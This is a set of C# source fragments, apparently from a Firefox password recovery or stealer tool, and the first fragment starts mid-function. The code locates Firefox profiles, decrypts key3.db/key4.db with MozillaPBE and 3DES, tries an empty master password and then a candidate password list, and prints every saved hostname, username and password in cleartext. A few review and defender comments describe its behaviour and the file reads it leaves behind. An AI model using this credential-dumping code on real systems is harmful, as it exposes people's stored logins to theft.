ByteHelper.ConvertHexStringToByteArray(pwdCheck.EntrySalt)); CheckPwd.Compute(); string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, ByteHelper.ConvertHexStringToByteArray(pwdCheck.Passwordcheck)); if (!decryptedPwdChk.StartsWith("password-check")) { Console.WriteLine("Master password is wrong !"); return(0); } // Get private 
key string f81 = (from p in db.Keys where !p.Key.Equals("global-salt") && !p.Key.Equals("Version") && !p.Key.Equals("password-check") select p.Value).FirstOrDefault().Replace("-", ""); Asn1DerObject f800001 = asn.Parse(ByteHelper.ConvertHexStringToByteArray(f81)); if (Verbose) { Console.WriteLine("F800001"); Console.WriteLine(f800001.ToString()); } MozillaPBE CheckPrivateKey = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), f800001.objects[0].objects[0].objects[1].objects[0].Data); CheckPrivateKey.Compute(); byte[] decryptF800001 = TripleDESHelper.DESCBCDecryptorByte(CheckPrivateKey.Key, CheckPrivateKey.IV, f800001.objects[0].objects[1].Data); Asn1DerObject f800001deriv1 = asn.Parse(decryptF800001); if (Verbose) { Console.WriteLine("F800001 first derivation"); Console.WriteLine(f800001deriv1.ToString()); } Asn1DerObject f800001deriv2 = asn.Parse(f800001deriv1.objects[0].objects[2].Data); if (Verbose) { Console.WriteLine("F800001 second derivation"); Console.WriteLine(f800001deriv2.ToString()); } byte[] privateKey = new byte[24]; if (f800001deriv2.objects[0].objects[3].Data.Length > 24) { Array.Copy(f800001deriv2.objects[0].objects[3].Data, f800001deriv2.objects[0].objects[3].Data.Length - 24, privateKey, 0, 24); } else { privateKey = f800001deriv2.objects[0].objects[3].Data; } if (Verbose) { Console.WriteLine("Private key = " + privateKey.ToString()); } // decrypt username and password using (SQLiteConnection cnn = new SQLiteConnection("Data Source=" + Path.Combine(filePath, "signons.sqlite"))) { cnn.Open(); SQLiteCommand mycommand = new SQLiteCommand(cnn); mycommand.CommandText = "select hostname, encryptedUsername, encryptedPassword, guid, encType from moz_logins;"; SQLiteDataReader reader = mycommand.ExecuteReader(); dt.Load(reader); } foreach (DataRow row in dt.Rows) { Asn1DerObject user = asn.Parse(Convert.FromBase64String(row["encryptedUsername"].ToString())); Asn1DerObject pwd = 
asn.Parse(Convert.FromBase64String(row["encryptedPassword"].ToString())); if (Verbose) { Console.WriteLine("User= "******"Pwd= " + pwd.ToString()); } string hostname = row["hostname"].ToString(); string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data); string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data); Console.WriteLine(hostname + " " + Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "") + " " + Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", "")); } return(0); }
// Initialize: opens <profilePath>\key3.db with BerkeleyDb, reads "password-check" and "global-salt", and
// tests candidate passwords with the local function CheckPassword, which decrypts the check value and
// requires it to start with "password-check". The empty password is tried first; if it fails, each entry
// of PasswordList is tried in order until one passes. Returns false when no candidate passes.
// On success the remaining (non-reserved) key3.db entry is decrypted with the accepted password and
// _privateKey is set to the last 24 bytes of the nested Data field (or the field as-is when <= 24 bytes).
// NOTE(review): First() throws InvalidOperationException when a key is absent and nothing here catches
// it, so a malformed store surfaces as an exception rather than a false return.
// Defender note: the candidate loop means a primary password protects this store only as far as it is
// absent from such a list; the empty default always passes on the first attempt.
public bool Initialize(string profilePath) { BerkeleyDb db = new BerkeleyDb(Path.Combine(profilePath, "key3.db")); PasswordCheck pwdCheck = new PasswordCheck(db.Keys.Where(p => p.Key.Equals("password-check")) .Select(p => p.Value).First().Replace("-", "")); string globalSalt = db.Keys.Where(p => p.Key.Equals("global-salt")) .Select(p => p.Value) .First() .Replace("-", ""); var globalSaltBytes = StringExtensions.HexToBytes(globalSalt); var pwdCheckSaltBytes = StringExtensions.HexToBytes(pwdCheck.EntrySalt); var masterPassword = ""; bool CheckPassword(string password) { MozillaPBE checkPwd = new MozillaPBE(globalSaltBytes, Encoding.ASCII.GetBytes(password), pwdCheckSaltBytes); checkPwd.Compute(); string decryptedPwdChk = TripleDesHelper.DescbcDecryptor(checkPwd.Key, checkPwd.IV, StringExtensions.HexToBytes(pwdCheck.Passwordcheck)); return(decryptedPwdChk.StartsWith("password-check")); } if (!CheckPassword(masterPassword)) { var foundPassword = false; if (PasswordList?.Length > 0) { foreach (var password in PasswordList) { masterPassword = password; foundPassword = CheckPassword(password); if (foundPassword) { break; } } } if (!foundPassword) { return(false); } } //private key string f81 = db.Keys.Where(p => !p.Key.Equals("global-salt") && !p.Key.Equals("Version") && !p.Key.Equals("password-check")) .Select(p => p.Value) .First() .Replace("-", ""); Asn1DerObject f800001 = Asn1Der.Parse(StringExtensions.HexToBytes(f81)); MozillaPBE checkPrivateKey = new MozillaPBE(StringExtensions.HexToBytes(globalSalt), Encoding.ASCII.GetBytes(masterPassword), f800001.Objects[0].Objects[0].Objects[1].Objects[0].Data); checkPrivateKey.Compute(); byte[] decryptF800001 = TripleDesHelper.DescbcDecryptorByte(checkPrivateKey.Key, checkPrivateKey.IV, f800001.Objects[0].Objects[1].Data); Asn1DerObject f800001deriv1 = Asn1Der.Parse(decryptF800001); Asn1DerObject f800001deriv2 = Asn1Der.Parse(f800001deriv1.Objects[0].Objects[2].Data); if (f800001deriv2.Objects[0].Objects[3].Data.Length > 24) { 
_privateKey = new byte[24]; Array.Copy(f800001deriv2.Objects[0].Objects[3].Data, f800001deriv2.Objects[0].Objects[3].Data.Length - 24, _privateKey, 0, 24); } else { _privateKey = f800001deriv2.Objects[0].Objects[3].Data; } return(true); }
public static int Main(string[] args) { string MasterPwd = string.Empty; byte[] privateKey = new byte[24]; bool loginsFound = false, signonsFound = false; string signonsFile = string.Empty, loginsFile = string.Empty;; string filePath = string.Empty; DBHelper dbh = new DBHelper(); Converts conv = new Converts(); // Read berkeleydb DataTable dt = new DataTable(); Asn1Der asn = new Asn1Der(); List <LoginFieldS> lp = new List <LoginFieldS>(); List <string> dirs = Directory.GetDirectories(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Mozilla\\Firefox\\Profiles")).ToList(); //Manage args for (int i = 0; i < args.Length; i++) { if (args[i].Equals("-p")) { MasterPwd = args[i + 1]; } if (args[i].Equals("-f")) { dirs.Clear(); dirs.Add(args[i + 1]); } if (args[i].Equals("-v")) { Verbose = true; } if (args[i].Equals("-h")) { Console.WriteLine("FirePwd.Net v0.1"); Console.WriteLine("Usage :"); Console.WriteLine("\t -p to specify Master Password"); Console.WriteLine("\t -v to activate verbose mode"); Console.WriteLine("\t -f to specify path for files key3.db and signons.sqlite"); return(0); } } foreach (string dir in dirs) { // Check if files exists string[] files = Directory.GetFiles(dir, "signons.sqlite"); if (files.Length > 0) { filePath = dir; signonsFile = files[0]; signonsFound = true; } // find logins.json file files = Directory.GetFiles(dir, "logins.json"); if (files.Length > 0) { filePath = dir; loginsFile = files[0]; loginsFound = true; } if (!loginsFound && !signonsFound) { Console.WriteLine("File signons & logins not found."); continue; } if (filePath == string.Empty) { Console.WriteLine("Mozilla not found."); continue; } if (Verbose) { Console.WriteLine("Check if exist key3.db or key3.db"); } // Check if files exists if (!File.Exists(Path.Combine(filePath, "key3.db"))) { privateKey = dbh.CheckKey4DB(dir, MasterPwd, Verbose); } else { privateKey = dbh.CheckKey3DB(dir, MasterPwd, Verbose); } if (privateKey == null || 
privateKey.Length == 0) { Console.WriteLine("Private key return null"); continue; } FFLogins ffLoginData; if (signonsFound) { if (Verbose) { Console.WriteLine("Fetch users fron signons file"); } using (SQLiteConnection cnn = new SQLiteConnection("Data Source=" + Path.Combine(filePath, "signons.sqlite"))) { cnn.Open(); SQLiteCommand mycommand = new SQLiteCommand(cnn); mycommand.CommandText = "select hostname, encryptedUsername, encryptedPassword, guid, encType from moz_logins;"; SQLiteDataReader reader = mycommand.ExecuteReader(); dt.Load(reader); } foreach (DataRow row in dt.Rows) { Asn1DerObject user = asn.Parse(Convert.FromBase64String(row["encryptedUsername"].ToString())); Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(row["encryptedPassword"].ToString())); string hostname = row["hostname"].ToString(); string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data); string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data); string username = Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", ""); string password = Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", ""); lp.Add(new LoginFieldS { url = hostname, userName = username, password = password }); } } if (loginsFound) { if (Verbose) { Console.WriteLine("Fetch users fron logins file"); } using (StreamReader sr = new StreamReader(Path.Combine(filePath, "logins.json"))) { string json = sr.ReadToEnd(); ffLoginData = JsonConvert.DeserializeObject <FFLogins>(json); } foreach (LoginData loginData in ffLoginData.logins) { Asn1DerObject user = asn.Parse(Convert.FromBase64String(loginData.encryptedUsername)); Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(loginData.encryptedPassword)); string hostname = loginData.hostname; string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, 
user.objects[0].objects[2].Data); string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data); string username = Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", ""); string password = Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", ""); lp.Add(new LoginFieldS { url = hostname, userName = username, password = password }); } } } foreach (var userInfo in lp) { Console.WriteLine("==================================================="); Console.WriteLine($"url:{userInfo.url}\nUsername: {userInfo.userName}\nPassword:{userInfo.password}"); Console.WriteLine("==================================================="); } Console.Read(); return(0); }
/// <summary>
/// Recovers the logins stored in a Firefox profile directory and prints each
/// hostname, username and password to the console in cleartext.
/// Steps: fetch the 'password' metadata row, validate the password-check value,
/// decrypt the private key from nssPrivate, then decrypt every entry parsed
/// from logins.json with that key.
/// </summary>
/// <param name="directory">Profile directory; passed to GetItemsFromQuery and used to build the logins.json path.</param>
/// <param name="userName">Only used as a label in the console output.</param>
/// <param name="masterPassword">Passed to decrypt3DES when decrypting the private key; defaults to an empty string.</param>
/// <returns>Always null; results are written to the console only.</returns>
/// <remarks>
/// Defender's view: the artefacts touched are the key store queried through
/// GetItemsFromQuery (the log message names key4.db; the helper is not visible
/// here, so confirm) and logins.json. Reads of both files by a process other
/// than the browser are the observable behaviour of this routine.
/// </remarks>
private static String Parse4Logins(string directory, string userName, string masterPassword = "")
{
    Asn1Der asn = new Asn1Der();
    byte[] item2 = new byte[] { };
    byte[] item1 = new byte[] { };
    byte[] a11 = new byte[] { };
    byte[] a102 = new byte[] { };
    // item1 and item2 of the 'password' metadata row; item1 is reused below as
    // input to both MozillaPBE and decrypt3DES (presumably the global salt; confirm).
    string query = "SELECT item1,item2 FROM metadata WHERE id = 'password'";
    GetItemsFromQuery(directory, ref item1, ref item2, query);
    Console.WriteLine("Fetch data from key4.db file");
    Asn1DerObject f800001 = asn.Parse(item2);
    // NOTE(review): the check key is derived from an empty password, not from
    // masterPassword. If the check value does not decrypt to "password-check"
    // under the empty password, the function returns below without touching
    // logins.json; presumably that is the case for a profile with a Primary
    // Password set (confirm against MozillaPBE).
    MozillaPBE CheckPwd = new MozillaPBE(item1, Encoding.ASCII.GetBytes(""), f800001.objects[0].objects[0].objects[1].objects[0].Data);
    CheckPwd.Compute();
    string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, f800001.objects[0].objects[1].Data);
    if (!decryptedPwdChk.StartsWith("password-check"))
    {
        Console.WriteLine("Master password is wrong !");
        return(null);
    }
    // a102 is fetched but never read in this function.
    query = "SELECT a11,a102 FROM nssPrivate";
    GetItemsFromQuery(directory, ref a11, ref a102, query);
    var decodedA11 = asn.Parse(a11);
    // The fixed index paths assume one specific ASN.1 layout; any other layout
    // throws here, outside the try block below.
    var entrySalt = decodedA11.objects[0].objects[0].objects[1].objects[0].Data;
    var cipherT = decodedA11.objects[0].objects[1].Data;
    byte[] privateKey;
    try
    {
        privateKey = decrypt3DES(item1, masterPassword, entrySalt, cipherT);
    }
    catch
    {
        Console.WriteLine("[X] Could not retrieve private key.");
        return(null);
    }
    // decrypt username and password
    // The hard-coded backslash separator makes this a Windows-style path.
    string loginsJsonPath = String.Format("{0}\\{1}", directory, "logins.json");
    Login[] logins = null;
    // NOTE(review): the empty catch swallows any ParseLoginFile failure and
    // leaves logins null, so logins.Length below throws NullReferenceException
    // instead of reaching the "No logins discovered" message.
    try
    {
        logins = ParseLoginFile(loginsJsonPath);
    }
    catch { }
    if (logins.Length == 0)
    {
        Console.WriteLine("No logins discovered from logins.json");
        return(null);
    }
    foreach (Login login in logins)
    {
        // Each stored field is base64 text wrapping an ASN.1 structure; the two
        // byte arrays taken from it are passed to the decryptor with privateKey.
        Asn1DerObject user = asn.Parse(Convert.FromBase64String(login.encryptedUsername));
        Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(login.encryptedPassword));
        string hostname = login.hostname;
        string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data);
        string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data);
        // Cleartext credentials go straight to stdout. The regex removes every
        // character outside U+0020..U+007F, so non-ASCII characters in a stored
        // username or password are dropped from the printed value.
        Console.WriteLine("--- FireFox Credential (User: {0}) ---", userName);
        Console.WriteLine("Hostname: {0}", hostname);
        Console.WriteLine("Username: {0}", Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", ""));
        Console.WriteLine("Password: {0}", Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", ""));
        Console.WriteLine();
    }
    return(null);
}